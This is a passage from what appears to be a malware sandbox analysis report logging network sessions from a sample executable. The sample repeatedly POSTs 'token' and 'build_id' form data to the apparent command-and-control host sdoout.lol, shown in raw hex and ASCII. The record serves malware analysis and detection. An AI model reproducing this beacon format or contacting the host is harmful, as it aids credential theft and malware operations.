                                                                                                                                                                                                                                                                                          2024-12-30 14:56:39 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 63 74 30 68 34 65 63 6a 77 74 6a 35 38 79 35 38 39 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 63 74 30 68 34 65 63 6a 77 74 6a 35 38 79 35 38 39 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 63 74 30 68 34 65 63 6a 77 74 6a 35 38 79 35 38 39 30 30 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ct0h4ecjwtj58y589000Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ct0h4ecjwtj58y589000Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ct0h4ecjwtj58y589000Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:40 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          92192.168.2.954028116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:40 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----y5fc2vsr1db1n7gvsjwl
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:40 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 32 76 73 72 31 64 62 31 6e 37 67 76 73 6a 77 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------y5fc2vsr1db1n7gvsjwlContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------y5fc2vsr1db1n7gvsjwlContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------y5fc2vsr1db1n7gvsjwlCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          93192.168.2.954029116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:41 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----opz5fu3ophvsriwlnycj
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:41 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 6f 70 7a 35 66 75 33 6f 70 68 76 73 72 69 77 6c 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6f 70 7a 35 66 75 33 6f 70 68 76 73 72 69 77 6c 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6f 70 7a 35 66 75 33 6f 70 68 76 73 72 69 77 6c 6e 79 63 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------opz5fu3ophvsriwlnycjContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------opz5fu3ophvsriwlnycjContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------opz5fu3ophvsriwlnycjCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          94192.168.2.954030116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----s0zm7q9000r9zuk6p89z
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 73 30 7a 6d 37 71 39 30 30 30 72 39 7a 75 6b 36 70 38 39 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------s0zm7q9000r9zuk6p89zContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------s0zm7q9000r9zuk6p89zContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------s0zm7q9000r9zuk6p89zCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:42 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          95192.168.2.954031116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:43 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----wt26phd26pz5f3ekf3eu
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:43 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------wt26phd26pz5f3ekf3euCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:43 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          96192.168.2.954032116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:44 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26x4wtrim79h47qiw4wt
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:44 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------26x4wtrim79h47qiw4wtContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------26x4wtrim79h47qiw4wtContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------26x4wtrim79h47qiw4wtCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:44 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          97192.168.2.954033116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:45 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26x4wtrim79h47qiw4wt
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:45 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 36 78 34 77 74 72 69 6d 37 39 68 34 37 71 69 77 34 77 74 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------26x4wtrim79h47qiw4wtContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------26x4wtrim79h47qiw4wtContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------26x4wtrim79h47qiw4wtCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          98192.168.2.954034116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:46 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----90zct2v3e3op8qqq16f3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:46 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------90zct2v3e3op8qqq16f3Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:46 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          99192.168.2.954035116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----90zct2v3e3op8qqq16f3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:47 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------90zct2v3e3op8qqq16f3Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:47 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          100192.168.2.954036116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:48 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----d2n7900rimglf37g4ozu
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:48 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 64 32 6e 37 39 30 30 72 69 6d 67 6c 66 33 37 67 34 6f 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 37 39 30 30 72 69 6d 67 6c 66 33 37 67 34 6f 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 37 39 30 30 72 69 6d 67 6c 66 33 37 67 34 6f 7a 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------d2n7900rimglf37g4ozuContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------d2n7900rimglf37g4ozuContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------d2n7900rimglf37g4ozuCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:48 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
